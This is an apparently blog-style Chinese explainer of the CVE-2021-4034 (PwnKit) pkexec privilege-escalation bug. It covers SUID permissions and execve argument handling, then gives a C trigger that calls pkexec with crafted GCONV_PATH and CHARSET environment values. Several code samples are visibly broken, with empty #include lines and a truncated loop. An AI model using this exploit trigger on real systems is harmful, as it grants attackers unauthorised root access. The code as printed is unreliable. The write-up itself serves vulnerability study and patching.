本篇文章主要叙述CVE-2021-4034漏洞,该漏洞影响的linux发行版众多,例如:Ubuntu、CentOS、Debian等等,该漏洞为Linux系统本地提权漏洞,利用脚本已经公开,利用简单且稳定,脚本地址:Github
当攻击者获取目标系统普通用户权限时,利用该脚本即可直接获得root权限,该漏洞的主要原因是因为polkit中的pkexec程序对参数个数判断不佳,导致数组溢出,具体分析过程将在下面慢慢介绍。首先得先了解下suid、sgid、sbit的特殊权限,将对后面分析起到帮助,也对后续的渗透学习开辟一些新鲜道路。
suid、sgid、sbit是文件权限管理的特殊命令,基本的Linux权限为9个,分别为rwx rwx rwx,利用命令ll -a 加文件路径会发现有一些特殊的权限位符号。例如:
这里有一个特殊权限位:s
Linux有十二个权限符:
属主 | 属组 | 其他人 | 用户位 | 用户组 | 其他用户 |
---|---|---|---|---|---|
rwx | rwx | rwx | suid | sgid | sbit |
SUID的目的:为了让本来没有相应权限的用户运行这个程序,可以短暂的享有该程序拥有者的权限。就比如上方图例,/usr/bin/passwd该二进制程序是用来修改密码的,但是linux系统中用户众多,有root、普通用户等等,这些用户都需要在特殊情况修改密码,比如在忘记登录密码时。
具体流程:
参数解释: |
---|
-perm:利用权限进制搜索 |
-type:指定文件类型(l:软连接类型;d:文件夹类型;f:文件类型) |
-ls:搜索的数据进行格式化输出 |
-delete:对匹配的数据进行删除 |
符号类型改变权限 | 数字类型改变档案权限 | 用 ls -l 来查看 |
---|---|---|
1. chmod u+s test-- 为test文件加上setuid标志 | setuid位, 如果该位为1, 则表示设置setuid 4- - - | rwsrw-r-- 表示有setuid标志 |
2.chmod g+s test-- 为test目录加上setgid标志 | setgid位, 如果该位为1, 则表示设置setgid 2— | rwxrwsrw- 表示有setgid标志 |
3.chmod o+t test-- 为test目录加上sticky标志 | sticky位, 如果该位为1, 则表示设置sticky 1— | rwxrw-rwt 表示有sticky标志 |
1、实例代码:
#include
int main(int argc, char** argv){
printf("argc:%d\n", argc);
for(int i;i
#include
int execve(const char *pathname, char *const argv[], char *const envp[]);
#include
int main(int argc, char **argv){
return execve("./test", NULL, NULL);
}
#include
int main(){
char* const argv[] = {
"AAAAAA1111",
"AAAAAA1111",
"AAAAAA1111",
NULL
};
char* const envp[] = {
"AAAAAA1111",
"AAAAAA1111",
"AAAAAA1111",
NULL
};
return execve("./test", argv, envp);
}
#include
int main(int argc, char** argv)
{
printf("argc: %d\n", argc);
for(int i; i<8; i++) {
if(argv[i]!=NULL) {
printf("argv[%d]: %s\n", i, argv[i]);
} else {
printf("argv[%d]: NULL\n", i);
}
}
return 0;
}
具体分析过程请参考本文最后(大佬分析的特别完善,受益匪浅)
本漏洞主要被利用的包括以下几点:
攻击者可以做以下操作提升至root权限:
#include
int main(int argc, char **argv)
{
char * const args[] = {
NULL
};
char * const environ[] = {
"pwnkit.so:.",
"PATH=GCONV_PATH=.",
"SHELL=/lol/i/do/not/exists",
"CHARSET=PWNKIT",
"GIO_USE_VFS=",
NULL
};
return execve("/usr/bin/pkexec", args, environ);
}
或者可以:
主要有:pkexec版本为0.105之前
目前各大linux发行版都给出了安全补丁,升级即可修复该漏洞。
漏洞参考:https://bbs.pediy.com/thread-271423.htm#msg_header_h2_6